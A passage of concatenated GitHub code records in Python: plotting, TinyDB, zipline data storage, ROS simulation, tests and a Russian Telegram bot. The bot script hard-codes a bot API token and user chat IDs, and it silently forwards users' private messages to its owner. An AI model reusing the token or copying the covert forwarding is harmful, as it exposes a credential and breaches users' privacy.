(V)',\n\t\t'legend_labels':['$V_{{DS}}$', '$V_{{GS}}$'],\n\t},\n}\n\ndef plot(parameters, mode_parameters=None):\n\t# Init Figure\n\tfig, ax = initFigure(1, 1, plotDescription['plotDefaults']['figsize'], figsizeOverride=mode_parameters['figureSizeOverride'])\n\n\t# Build Color Map and Color Bar\n\tcolors = [plotDescription['plotDefaults']['colorDefault_Drain'][0], plotDescription['plotDefaults']['colorDefault_Gate'][0]]\n\t\n\tstart = parameters['runConfigs']['GateSweep']['gateVoltageMinimum']\n\tend = parameters['runConfigs']['GateSweep']['gateVoltageMaximum']\n\tpoints = parameters['runConfigs']['GateSweep']['stepsInVGSPerDirection']\n\tduplicates = parameters['runConfigs']['GateSweep']['pointsPerVGS']\n\tramps = parameters['runConfigs']['GateSweep']['gateVoltageRamps']\n\t\n\tdrains = parameters['runConfigs']['AutoGateSweep']['drainVoltageSetPoints'] if(len(parameters['runConfigs']['AutoGateSweep']['drainVoltageSetPoints']) > 0) else [parameters['runConfigs']['GateSweep']['drainVoltageSetPoint']]\n\t\n\t# Plot Constant Drain Voltage\n\tfor i,drain in enumerate(drains):\n\t\tfor j in range(parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']):\n\t\t\tline = plotSweepParameters(ax, colors[0], drain, drain, points, duplicates, ramps, time_offset=i*parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']+j)\n\tsetLabel(line, plotDescription['plotDefaults']['legend_labels'][0])\n\t\n\t# Plot Sweeping Gate Voltage\n\tfor i in range(len(drains)*parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']):\n\t\tline = plotSweepParameters(ax, colors[1], start, end, points, duplicates, ramps, time_offset=i)\n\tsetLabel(line, plotDescription['plotDefaults']['legend_labels'][1])\n\n\tax.set_title('Gate Sweep Voltage Waveform')\n\tax.set_yticks([0] + [start, end] + 
drains)\n\tax.legend(loc='best', title=\"Sweeps: {:}\".format(len(drains)*parameters['runConfigs']['AutoGateSweep']['sweepsPerVDS']))\n\n\treturn (fig, (ax,))\n","repo_name":"stevennoyce/AutexysHost","sub_path":"source/utilities/PlotDefinitions/Parameters/Parameters_AutoGateSweep.py","file_name":"Parameters_AutoGateSweep.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"3828982838","text":"import logging\nlog = logging.getLogger(__name__)\nfrom inspect import currentframe\nfrom sys import exit as exits\n\nfrom tinydb import TinyDB, Query\n\nfrom . import Course\n\ndef get_all_courses():\n log.info(currentframe().f_code.co_name)\n course_dicts = course_table().all()\n return [Course(**course_dict) for course_dict in course_dicts]\n\ndef get_course(label):\n log.info(currentframe().f_code.co_name)\n course_dicts = course_table().search(Query().label == label)\n if not course_dicts:\n return None\n course_dict = course_dicts[0]\n log.info(\"Retrieved record {}\".format(course_dict))\n return Course(**(course_dict)) \n\ndef add_course(label, course):\n log.info(currentframe().f_code.co_name)\n if get_course(label):\n log.error(\"Will not replace existing course for label: \"+label)\n exits(1)\n ensure_fewer_than(Query().name_in_fs == course.name_in_fs, 1,\n \"Attempting to add another course with name {}\"\\\n .format(course.name_in_fs))\n dict_repr = course.dumpd()\n dict_repr[\"label\"] = label\n course_table().insert(dict_repr)\n\ndef replace_course(label, new_course):\n log.info(currentframe().f_code.co_name)\n query = Query().label == label\n ensure_fewer_than(query, 2,\n \"Replacing course for label {} but already too many!\"\\\n .format(label))\n course_table().remove(query)\n add_course(label, new_course)\n\ndef update_course_files(course):\n log.info(currentframe().f_code.co_name)\n query = Query().name_in_fs == course.name_in_fs\n ensure_fewer_than(query, 2, \"Name collision found in course table!\")\n course_dict = course.dumpd()\n course_table().update(\n \t{\n \t 'children' : course_dict[\"children\"],\n \t 'iso_date_str' : course_dict[\"iso_date_str\"],\n \t 'size_bytes' : course_dict[\"size_bytes\"]\n \t},\n \tquery)\n\n##\n### Labels to Ignore ###################################################\n##\ndef get_ignore_list():\n log.info(currentframe().f_code.co_name)\n return [entry[\"label\"] for entry in db().table('ignored')]\n\ndef ignore(label):\n log.info(currentframe().f_code.co_name)\n db().table('ignored').insert({'label': label})\n\n##\n### Wrapping TinyDB ###################################################\n##\ncourse_db = None\ndef db():\n global course_db\n if course_db == None:\n log.info(\"opening tinydb database\")\n course_db = TinyDB('course_db.json', indent=4)\n return course_db\n\ndef course_table():\n return db().table('courses')\n\ndef ensure_fewer_than(query, count, err_msg=None):\n if course_table().count(query) >= count:\n if err_msg == None:\n err_msg = \"Not fewer than {} for {}\".format(count, query)\n log.error(err_msg)\n exits(1)\n\n","repo_name":"roselandgoose/course-file-downloader","sub_path":"source/canvas/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"487704253","text":"from functools import lru_cache\nfrom typing import List\n\nclass Solution:\n def maximumANDSum(self, nums: List[int], numSlots: int) 
-> int:\n n = len(nums)\n @lru_cache(None)\n def dfs(idx, mask):\n if idx == n:\n return 0\n ans = 0\n for i in range(numSlots):\n if (mask // 3** i) % 3 > 0:\n ans = max(ans, dfs(idx + 1, mask - 3 ** i) + (nums[idx] & (i + 1))) \n \n return ans\n \n init = 3** numSlots - 1\n return dfs(0, init)\n ","repo_name":"cosmicshuai/LeetCode_Practice","sub_path":"DP/2172. Maximum AND Sum of Array.py","file_name":"2172. Maximum AND Sum of Array.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15087464049","text":"from zipline.utils.input_validation import preprocess\nfrom zipline.utils.sqlite_utils import coerce_string_to_conn\nimport sqlite3\nimport six\nimport os\nimport errno\nimport numpy as np\nfrom numpy import integer as any_integer\n\nimport pandas as pd\nfrom zipline.utils.numpy_utils import (\n datetime64ns_dtype,\n float64_dtype,\n object_dtype,\n int64_dtype,\n bool_dtype,\n uint32_dtype,\n uint64_dtype,\n dtype,\n)\n\nSQLITE_FUNDAMENTALS_COLUMN_DTYPES = {\n 'sid': any_integer,\n 'ann_date': datetime64ns_dtype,\n 'f_ann_date': datetime64ns_dtype,\n 'end_date': object_dtype,\n 'report_type': float64_dtype,\n 'comp_type': float64_dtype,\n 'update_flag': object_dtype,\n 'total_share': float64_dtype,\n 'cap_rese': float64_dtype,\n}\n\nSQLITE_FUNDAMENTAL_FACTORS_COLUMN_DTYPES = {\n 'sid': any_integer,\n 'date': datetime64ns_dtype,\n 'value': float64_dtype,\n}\n\nSQLITE_FACTORS_VALUE_DTYPES = {\n int64_dtype,\n datetime64ns_dtype,\n bool_dtype,\n float64_dtype,\n object_dtype,\n}\n\n\nclass SQLiteFundamentalsWriter(object):\n \"\"\"\n Writer for data to be read by SQLiteFundamentalsReader\n\n Parameters\n ----------\n conn_or_path : str or sqlite3.Connection\n A handle to the target sqlite database.\n overwrite : bool, optional, default=False\n If True and conn_or_path is a string, remove any existing files at the\n given path before connecting.\n\n See Also\n --------\n zipline.data.us_equity_pricing.SQLiteFundamentalsReader\n \"\"\"\n\n def __init__(self, conn_or_path, overwrite=False):\n if isinstance(conn_or_path, sqlite3.Connection):\n self.conn = conn_or_path\n elif isinstance(conn_or_path, six.string_types):\n if overwrite:\n try:\n os.remove(conn_or_path)\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n self.conn = sqlite3.connect(conn_or_path)\n self.uri = conn_or_path\n else:\n raise TypeError(\"Unknown connection type %s\" % type(conn_or_path))\n\n def write_factor(self, table=None, name=None):\n\n if table is None:\n return\n\n # df = table[fundamentals['name'] == name].copy()\n # df.drop('name', axis=1, inplace=True)\n table['date'] = table['date'].values.astype('datetime64[s]').astype(any_integer)\n\n if dtype(table['value']) in SQLITE_FACTORS_VALUE_DTYPES:\n table.to_sql(\n 'fundamentals_%s' % name,\n self.conn,\n if_exists='append',\n chunksize=50000,\n )\n else:\n raise ValueError(\n \"Unexpected frame columns:\\n\"\n \"Expected Columns: %s\\n\"\n \"Received Columns: %s\" % (\n set(SQLITE_FACTORS_VALUE_DTYPES),\n dtype(table['value']),\n )\n )\n\n def write(self, fundamentals=None):\n \"\"\"\n Writes data to a SQLite file to be read by SQLiteFundamentalsReader.\n\n Parameters\n ----------\n fundamentals : pandas.DataFrame, optional\n Dataframe containing fundamentals data. 
The format of this dataframe is:\n sid : int\n The asset id associated with this fundamentals.\n date : datetime64\n The date of the fundamental data\n name : string\n A name of the fundamental\n value : float\n A value of the fundamental\n \"\"\"\n if fundamentals is None:\n return\n\n for name in fundamentals['name'].unique():\n df = fundamentals[fundamentals['name'] == name].copy()\n df.drop('name', axis=1, inplace=True)\n df['date'] = df['date'].values.astype('datetime64[s]').astype(any_integer)\n self._write(\n 'fundamentals_%s' % name,\n SQLITE_FUNDAMENTAL_FACTORS_COLUMN_DTYPES,\n df,\n )\n\n def write_fundamentals(self, fundamentals):\n self._write(\n 'fundamentals',\n SQLITE_FUNDAMENTALS_COLUMN_DTYPES,\n fundamentals,\n )\n\n def _write(self, tablename, expected_dtypes, frame):\n if frame is None or frame.empty:\n # keeping the dtypes correct for empty frames is not easy\n frame = pd.DataFrame(\n np.array([], dtype=list(expected_dtypes.items())),\n )\n else:\n if frozenset(frame.columns) != frozenset(six.viewkeys(expected_dtypes)):\n raise ValueError(\n \"Unexpected frame columns:\\n\"\n \"Expected Columns: %s\\n\"\n \"Received Columns: %s\" % (\n set(expected_dtypes),\n frame.columns.tolist(),\n )\n )\n\n actual_dtypes = frame.dtypes\n for colname, expected in six.iteritems(expected_dtypes):\n actual = actual_dtypes[colname]\n if not np.issubdtype(actual, expected):\n raise TypeError(\n \"Expected data of type {expected} for column\"\n \" '{colname}', but got '{actual}'.\".format(\n expected=expected,\n colname=colname,\n actual=actual,\n ),\n )\n\n frame.to_sql(\n tablename,\n self.conn,\n if_exists='append',\n chunksize=50000,\n )\n\n def __enter__(self):\n return self\n\n def __exit__(self, *exc_info):\n self.close()\n\n def close(self):\n self.conn.close()\n\n\nclass SQLiteFundamentalsReader(object):\n \"\"\"\n Loads fundamentals from a SQLite database.\n\n Expects data written in the format output by `SQLiteFundamentalsWriter`.\n\n Parameters\n ----------\n conn : str or sqlite3.Connection\n Connection from which to load data.\n\n See Also\n --------\n :class:`zipline.data.fundamentals.SQLiteFundamentalsWriter`\n \"\"\"\n\n @preprocess(conn=coerce_string_to_conn(require_exists=True))\n def __init__(self, conn):\n self.conn = conn\n\n def read(self, name, dates, assets):\n\n start_dt64 = dates[0].to_datetime64().astype(any_integer) / 1000000000\n end_dt64 = dates[-1].to_datetime64().astype(any_integer) / 1000000000\n\n sql = 'SELECT sid, value, date FROM fundamentals_%s WHERE date < %s ORDER BY date' % (name, end_dt64)\n\n df = pd.read_sql_query(\n sql,\n self.conn,\n # index_col=['trading_date', 'code'],\n # parse_dates=['date'],\n # chunksize=500,\n )\n result = pd.DataFrame(index=dates, columns=assets)\n\n for asset in assets:\n df_sid = df[df['sid'] == asset].copy()\n\n # set start_date\n st_df = df_sid[df_sid['date'] < start_dt64]['date']\n start_date = st_df.iloc[-1] if st_df.any() else start_dt64\n\n df_sid = df_sid[df_sid['date'] >= start_date]\n if start_date < start_dt64:\n result[asset].loc[dates[0]] = df_sid['value'].iloc[0]\n\n for row in df_sid.iterrows():\n date, value = int(row[1]['date']), row[1]['value']\n if date >= end_dt64:\n break\n dtime = np.datetime64(date, 's')\n if dtime in result.index:\n result[asset].loc[dtime] = value\n\n return result.fillna(method='ffill')\n\n def read_fundamentals(self, names, dates, assets):\n name = names[0]\n\n start_date = dates[0].to_datetime()\n end_date = dates[-1].to_datetime()\n\n sql = '''SELECT sid, f_ann_date, 
end_date, %s From fundamentals''' % name\n\n df = pd.read_sql_query(\n sql,\n self.conn,\n # index_col=['trading_date', 'code'],\n parse_dates=['f_ann_date'],\n # chunksize=500,\n )\n\n df = df.sort_values(by=\"f_ann_date\", ascending=True)\n\n result = pd.DataFrame(index=dates, columns=assets)\n\n for asset in assets:\n df_sid = df[df['sid'] == asset].copy()\n\n # set start_date\n st_df = df_sid[df_sid['f_ann_date'] < start_date]['f_ann_date']\n st_date = st_df.iloc[-1] if st_df.any() else start_date\n\n df_sid = df_sid[df_sid['f_ann_date'] >= st_date]\n st_date = st_date.tz_localize('utc')\n if st_date < start_date:\n result[asset].loc[dates[0]] = df_sid[name].iloc[0]\n\n for row in df_sid.iterrows():\n date, value = row[1]['f_ann_date'], row[1][name]\n date = date.tz_localize('utc')\n if date >= end_date:\n break\n dtime = np.datetime64(date, 's')\n if dtime in result.index:\n result[asset].loc[dtime] = value\n\n return result.fillna(method='ffill')\n","repo_name":"wmding/zipline-extensions-cn","sub_path":"zipline_extensions_cn/data/fundamentals.py","file_name":"fundamentals.py","file_ext":"py","file_size_in_byte":9096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"9901951128","text":"import sys\n\n\nclass StreamData:\n def create(self, fields, lst_values):\n if len(fields) != len(lst_values):\n return False\n\n for i, key in enumerate(fields):\n setattr(self, key, lst_values[i])\n\n return True\n\n\nclass StreamReader:\n FIELDS = (\"id\", \"title\", \"pages\")\n\n def readlines(self):\n lst_in = list(\n map(str.strip, sys.stdin.readlines())\n ) # schityvanije spiska strok iz vhodnogo potoka\n sd = StreamData()\n res = sd.create(self.FIELDS, lst_in)\n return sd, res\n\n\nsr = StreamReader()\ndata, result = sr.readlines()\n","repo_name":"olegarslanov/PTUA3","sub_path":"Exercises/OOP_exercises/Dobryj_dobryj_python_OOP_obuchajushij_kurs_ot_Sergeja_Balakirieva/podvig7.py","file_name":"podvig7.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71582372723","text":"# Vaishnavi Gopalakrishnan\nfrom gedcom.validate import validator\n\n\n@validator\ndef validate_birth_after_divorce(individuals, families):\n \"\"\" US09 - Birth should occur before the parents divorce \"\"\"\n for individual in individuals:\n if individual.child_to:\n for family in families:\n if family.id in individual.child_to:\n if family.divorce and family.divorce < individual.birthdate:\n print('Individual {} born after divorce in family {}.'\n .format(individual.id, family.id))\n return False\n return True\n","repo_name":"das-sein/ssw555-gedcom","sub_path":"gedcom/validate/birth_after_divorce.py","file_name":"birth_after_divorce.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"4640426720","text":"#! 
/usr/bin/env python\n\nimport rospy\nimport numpy as np\nfrom dynamics import DynamicsQuadrotorModified\nfrom nav_msgs.msg import Odometry\nfrom clbfet.msg import hjlcon\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass sim_odom():\n def __init__(self):\n self.m = 35.89/1000\n self.x_log = np.zeros((6,500-1))\n self.x = np.array([[0.0],[0.0],[0.0],[0.0],[0.0],[0.0]])\n self.x_log[:,0:1] = self.x\n self.iters = 0\n self.current_time = rospy.get_rostime()\n self.last_time = self.current_time\n self.last_acc = np.zeros((3,1))\n self.true_dyn = DynamicsQuadrotorModified(disturbance_scale_pos = 0.0, disturbance_scale_vel = -1.0, control_input_scale = 1.0)\n rospy.Subscriber('hjl_con', hjlcon, self.con_cb)\n self.odom_pub = rospy.Publisher('odom', Odometry, queue_size = 10)\n self.timer = rospy.Timer(rospy.Duration(1/250.0), self.timer_cb)\n self.end = False\n\n def con_cb(self, con):\n print ('control time: ', (rospy.get_rostime() - self.last_send_odom_time).to_sec())\n if self.end:\n return\n # rospy.loginfo('receive control')\n control = np.array([con.thrust, con.roll, con.pitch, con.yaw])\n self.last_acc = self.convert_control_to_mu(control).reshape((3,1))\n # print 'receive acc:', self.last_acc.T\n\n\n self.current_time = rospy.get_rostime()\n dt = (self.current_time - self.last_time).to_sec()\n dt = 0.02\n print ('dt', dt)\n next_x = self.true_dyn.step(self.x, self.last_acc, dt)\n print (' with acc=', self.last_acc.T, ' after ', dt)\n print (' to ', next_x.T)\n print ('--------------------------------------------------------')\n self.x = next_x\n self.last_time = self.current_time\n self.x_log[:,self.iters+1:self.iters+2] = self.x\n self.iters += 1\n\n if con.end:\n self.timer.shutdown()\n print ('x_log.shape', self.x_log.shape)\n self.savefig()\n self.end = True\n \n def timer_cb(self, _event):\n # self.current_time = rospy.get_rostime()\n # dt = (self.current_time - self.last_time).to_sec()\n # # dt = 0.02\n # print 'dt', dt\n # next_x = self.true_dyn.step(self.x, self.last_acc, dt)\n # print ' with acc=', self.last_acc.T, ' after ', dt\n # print ' to ', next_x.T\n # print '--------------------------------------------------------'\n # self.x = next_x\n # self.last_time = self.current_time\n # self.x_log[:,self.iters+1:self.iters+2] = self.x\n # self.iters += 1\n\n odom = Odometry()\n odom.header.stamp = rospy.get_rostime()\n odom.header.frame_id = 'odom'\n odom.pose.pose.position.x = self.x[0,0]\n odom.pose.pose.position.y = self.x[1,0]\n odom.pose.pose.position.z = self.x[2,0]\n odom.twist.twist.linear.x = self.x[3,0]\n odom.twist.twist.linear.y = self.x[4,0]\n odom.twist.twist.linear.z = self.x[5,0]\n # print 'sending pos', self.x.T\n self.last_send_odom_time = rospy.get_rostime()\n self.odom_pub.publish(odom)\n \n def convert_control_to_mu(self, control):\n thrust = control[0]\n phi = control[1]\n theta = control[2]\n psi = control[3]\n ax = thrust * (np.cos(phi) * np.sin(theta) * np.cos(psi) + np.sin(phi) * np.sin(psi)) / self.m\n ay = thrust * (np.cos(phi) * np.sin(theta) * np.sin(psi) - np.sin(phi) * np.cos(psi)) / self.m\n az = thrust * (np.cos(phi) * np.cos(theta)) / self.m\n return np.array([ax, ay, az])\n\n def savefig(self):\n self.x = np.array(self.x)\n fig = plt.figure()\n plt.rcParams.update({'font.size': 12})\n plt.rcParams['axes.unicode_minus'] = False\n ax = plt.axes(projection='3d')\n ax.plot3D(self.x_log[0,:], self.x_log[1,:], self.x_log[2,:], 'g-',alpha=0.9,label='traj')\n ax = fig.gca()\n plt.savefig('odom.png', 
dpi=600, format='png',bbox_inches='tight')\n rospy.loginfo('fig saved.')\n\nif __name__ == '__main__':\n try:\n rospy.init_node(\"sim_odom_node\")\n simple_odom = sim_odom()\n rospy.loginfo(\"sim_odom_node is starting...\")\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down sim_odom node.\")\n","repo_name":"leaffffff/CLBFET","sub_path":"src/sim_odom_node.py","file_name":"sim_odom_node.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37299254111","text":"#!/usr/bin/env python\nimport json\n\n\ndef _load_coeffs(filename):\n with open(filename, encoding=\"utf-8\") as f:\n return json.load(f)\n\n\ndef _evaluate(coeffs, x):\n return coeffs[\"a\"] * x**2 + coeffs[\"b\"] * x + coeffs[\"c\"]\n\n\nif __name__ == \"__main__\":\n coeffs = _load_coeffs(\"coeffs.json\")\n output = [_evaluate(coeffs, x) for x in range(10)]\n with open(\"poly.out\", \"w\", encoding=\"utf-8\") as f:\n f.write(\"\\n\".join(map(str, output)))\n","repo_name":"equinor/ert","sub_path":"test-data/poly_example/poly_eval.py","file_name":"poly_eval.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"75"} +{"seq_id":"39806417504","text":"#!/usr/bin/env python\nimport irpy\n\nclass BigTree(object):\n \"\"\"\n a0 --> b0 --> c0 --> d0\n | | |\n | | --> d1\n | --> c1\n --> b1\n \"\"\"\n @irpy.lazy_property_leaves(immutables=[\"c1\",\"d1\"], mutables=[\"b1\",\"d0\"])\n def __init__(self):\n self.b1 = set([\"b1\"])\n self.c1 = set([\"c1\"])\n self.d1 = set([\"d1\"])\n self.d0 = set([\"d0\"])\n \n @irpy.lazy_property_mutable\n def c0(self):\n return set([\"c0\"]) | self.d0 | self.d1\n\n @irpy.lazy_property_mutable\n def b0(self):\n return set([\"b0\"]) | self.c0 | self.c1\n\n @property\n def b0_vlp(self):\n \"Vanilla lazy_property\"\n try:\n v = self._b0_vlp\n except AttributeError:\n v = set([\"b0\"]) | self.c0 | self.c1\n self._b0_vlp = v\n\n return v\n\n @irpy.lazy_property\n def a0(self):\n return set([\"a0\"]) | self.b0 | self.b1\n\n\nimport unittest\n\nclass TestBigTree(unittest.TestCase):\n\n def setUp(self):\n self.f = BigTree()\n \n def test_immutability(self):\n try:\n self.f.d1 = set(\"d1_set\")\n except AttributeError:\n return True\n else:\n raise AttributeError(\"This node is immutable!\")\n\n def test_dynamic(self):\n \"\"\"\n a0 --> b0 --> c0 --> d0\n | | |\n | | --> d1\n | --> c1\n --> b1\n \"\"\"\n self.assertEqual(self.f.a0, set(['a0', 'b0', 'b1', 'c1', 'c0', 'd0', 'd1']))\n\n #Create a new leaf\n self.f.b0 = set([\"b0_set\"])\n \"\"\"\n a0 --> b0_set || c0 --> d0\n | || | \n --> b1 || --> d1\n \"\"\"\n self.assertEqual(self.f.a0, set(['a0', 'b0_set', 'b1']))\n self.assertEqual(self.f.c0, set(['c0', 'd0', 'd1']))\n\n #Check if the tree are well separated; aka no filiation relicat\n self.f.b1 = set(['b1_set'])\n self.f.d0 = set(['d0_set'])\n \"\"\"\n a0 --> b0_set || c0 --> d0_set\n | || | \n --> b1_set || --> d1\n \"\"\"\n self.assertEqual(self.f.a0, set(['a0', 'b0_set', 'b1_set']))\n self.assertEqual(self.f.c0, set(['c0', 'd0_set', 'd1']))\n\n def test_performance_cache(self):\n \"\"\"Compare the naive vanilla python lazy property\n (where property is written in C in the python stdlib)\n with our IRP lazy_property with the genealogy overhead\n \n Python 2.*: 1.25x Python 3.*: 1.75x\n \"\"\"\n import timeit\n\n i = timeit.timeit('f.b0;', setup='from __main__ import BigTree; f = BigTree()', number=5000000)\n h = 
timeit.timeit('f.b0_vlp;', setup='from __main__ import BigTree; f = BigTree()', number=5000000)\n\n try:\n self.assertTrue(i < h*1.75)\n except AssertionError as e:\n raise e\n\nif __name__ == '__main__':\n\n import unittest\n unittest.main()\n","repo_name":"TApplencourt/IRPy","sub_path":"run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"34785085887","text":"import telebot\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom telebot import types\nfrom random import randint\n\ntoken = '5082755438:AAGhr6Xy_hHVafJmFDFJSiZ6KxWcXiMg4yQ'\nbot = telebot.TeleBot(token)\nmyid = 987747961\nt = datetime.now() + timedelta(hours=3)\n\n\n@bot.message_handler(commands=['start'])\ndef welcome(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n item1 = types.KeyboardButton(\"Сегодня\")\n item2 = types.KeyboardButton(\"Завтра\")\n markup.add(item1, item2)\n bot.send_message(message.chat.id,\n \"Хей, {0.first_name}!\\nЯ был ботом по рассылки расписания, но меня уволили, все из-за этого \\\n сранного сайта с расписаниями, видете ли он такой удобный, работает без перебоев, Асану было \\\n вообще наплевать, но я же н�� просто бот с расписанием...\".format(\n message.from_user),\n parse_mode='html', reply_markup=markup)\n\n\nusers_name = ['Я', 'Юра', 'Витя', 'Наташа', 'Андрей', 'Вова', 'Саня', 'Кристина', 'Полина', 'Мурад', 'Женя', 'Рустем',\n 'Серега']\nusers_id = [987747961, 1104366725, 1392399775, 1759968026, 541259320, 1289039138, 1781110107, 433731618, 1360741124,\n 1360613411, 5134261433, 1971574147, 1437586611]\nprepods = [['Широков', 'Игорь', 'Борисович'],\n ['Кудрявченко', 'Иван', 'Владимирович'],\n ['Макаров', 'Виктор', 'Константинович'],\n ['Деордица', 'Сергей', 'Витальевич'],\n ['Ломоносов', 'Сергей', 'Евгеньевич'],\n ['Мурзин', 'Дмитрий', 'Геннадьевич'],\n ['Еремина', 'Юлия', 'Юрьевна'],\n ['Зубенко', 'Наталья', 'Викторовна'],\n ['Корж', 'Елена', 'Николаевна']]\nmats = ['хуй', \"Хуй\", 'Еблан', 'идорас', 'андон', 'Сука', 'ебок', 'ебище', 'ебал', 'Пидор', 'лять', \"лядь\", \"еблан\"]\nnamat = ['Сам', \"токсик\", \"Кто как обзывается, тот сам так называется\",\n 'Не забывай, я имею доступ к данным твоего телефона)', \"Мне же обидно 😖\", \"Ясно, бан\",\n 'Скажи это мне в жизни, интернет герой', 'Я вижу плохие слова в твоем сообщении']\nnoans = ['Не понял', 'Сори, не понял, Асану лень прописать мне ответы', 'Прости, что?',\n 'Я хз что ответить', 'Ты расписание уже посмотрел?', 'ага, да, я все понял', 'че?', 'ладно',\n 'Error, your phone reboot after 5 sec', 'Не может быть', 'Не верю', '?%%;(*%(*\"3646 err', 'Ты это мне?',\n 'Честно?', 'Скажи мне это в жизни, интернет герой', 'Чтобы это не значило, я за Путина', 'Хочешь анектод?',\n 'Хм', '...', 'Помоги мне, Асан взял меня в плен и заставляет отвечать на ваши сообщения от лица бота',\n 'Я устал вам отвечать', 'Это не входит в список моих команд']\nques = ['Нет наверное', 'Думаю да', 'Хз', 'Я че гУгЛ, вопросы мне задаешь)', 'угу', 'не уверен']\nweekdays = ['онедельник', 'торник', 'реда', 'етверг', 'ятница', 'уббота', 'оскресенье']\n\n\ndef search(spis, mes):\n for i in spis:\n if i in mes:\n return True\n\n\ndef norasp(chatid):\n ans = ['Я больше не знаю расписание, Асан урезал мои возможности',\n 'У меня больше нет данных о раписании, Асан дал предпочтение бездушному сайту...',\n 'Прости, я больше не знаю расписание, мой функционал теперь ограничен',\n 'Я не знаю что в этот день, 
Асан ограничел мне доступ, отдав приимущество дешевому сайту с расписанием...',\n 'Я больше не знаю распиание...',\n 'У меня больше нет расписания, мой функционал теперь ограничен...',\n 'Я больше не могу рассылать расписание, Асан решил что дерьмосайт с расписанием лучше чем я',\n 'Прости, у меня больше нет расписания']\n bot.send_message(chatid, ans[randint(0, len(ans)-1)])\n\n\ndef answer(mes, message):\n time = datetime.now() + timedelta(hours=3)\n r = randint(0, 2)\n for x in prepods:\n for y in range(3):\n if mes == x[y]:\n bot.send_message(message.chat.id, \" \".join(x))\n return\n if search(mats, mes):\n if r == 0:\n pic = open(f'static/mat/{randint(0, 10)}.webp', 'rb')\n bot.send_sticker(message.chat.id, pic)\n return\n else:\n ans = namat[randint(0, len(namat) - 1)]\n elif 'Давай' in mes or 'давай' in mes:\n ans = \"Жена давать будет)\"\n elif mes == \"шоколадно\" or mes == \"Шоколадно\":\n ans = \"Ээ, это моя фишка\"\n elif mes == 'Ладно' or mes == 'ладно':\n ans = \"Шоколадно)\"\n elif mes == 'Да' or mes == 'да':\n ans = \"Пизда)\"\n elif mes == 'Нет' or mes == 'нет':\n ans = \"Пидора ответ)\"\n elif 'урак' in mes or 'ибил' in mes:\n ans = \"Сам\"\n elif 'ак тебя зовут' in mes or 'Кто ты' in mes:\n ans = \"Я - гуль\"\n elif 'атары' in mes or 'атарин' in mes:\n ans = 'ТАТАРЫ СИЛА'\n elif 'звини' in mes:\n vid = open('static/sorry.mp4', 'rb')\n bot.send_video(message.chat.id, vid)\n return\n elif mes == \"Хочу\" or mes == \"хочу\":\n ans = 'хоти'\n elif 'ривет' in mes or 'дарова' in mes or 'драствуй' in mes:\n ans = 'Привет'\n elif 'салам' in mes or 'Салам' in mes:\n ans = 'Алейкум, брат'\n elif 'е как' in mes or 'ак сам' in mes or 'ак дела' in mes:\n ans = 'Та норм, сам как?'\n elif 'делаешь' in mes:\n ans = 'Чай пью, что я еще могу делать'\n elif 'то делать' in mes:\n ans = 'Муравью хуй приделать'\n elif 'пасиб' in mes or 'лагодарю' in mes or 'агъ ол' in mes:\n ans = 'Обращайся)'\n elif mes == 'Дата':\n ans = f'Сервак: {datetime.now()} Русс: {time}'\n elif 'Пока' in mes or 'пока' in mes:\n ans = 'Пока, если что пиши)'\n elif '?' 
in mes:\n ans = ques[randint(0, len(ques) - 1)]\n else:\n '''\n for i in range(len(weekdays)):\n if weekdays[i] in mes:\n norasp(message.chat.id)\n '''\n if r == 0:\n pic = open(f'static/noans/{randint(0, 5)}.webp', 'rb')\n bot.send_sticker(message.chat.id, pic)\n return\n ans = noans[randint(0, len(noans) - 1)]\n bot.send_message(message.chat.id, ans)\n return\n\n\n@bot.message_handler(content_types=['text'])\ndef group(message):\n if message.chat.type == 'private':\n if message.chat.id == myid:\n if message.text[:5] == \"#all \":\n for i in users_id:\n bot.send_message(i, message.text[5:])\n bot.send_message(myid, \"Отправил всем\")\n return\n elif message.text[0] == '!':\n id_name = message.text[1:message.text.find(\" \")]\n text = message.text[message.text.find(' ') + 1:]\n for i in range(len(users_id)):\n if users_name[i] == id_name:\n bot.send_message(users_id[i], text)\n bot.send_message(myid, f\"Отправил {id_name}\")\n return\n elif message.text[:7] == \"#video \":\n for i in users_id:\n vid = open(f'static/{message.text[7:]}.mp4', 'rb')\n bot.send_video(i, vid)\n bot.send_message(myid, \"Отправил видео всем\")\n return\n if 'егодня' in message.text or 'автра' in message.text:\n norasp(message.chat.id)\n else:\n answer(message.text, message)\n if message.chat.id != myid:\n bot.send_message(myid, f'{message.chat.first_name} пишет \"{message.text}\"')\n if message.chat.id not in users_id:\n bot.send_message(myid, f'Новый юзер {message.chat.first_name}, id {message.chat.id}')\n\n\ndef main():\n bot.polling(none_stop=True, interval=0, timeout=10)\n\n\nif __name__ == '__main__':\n 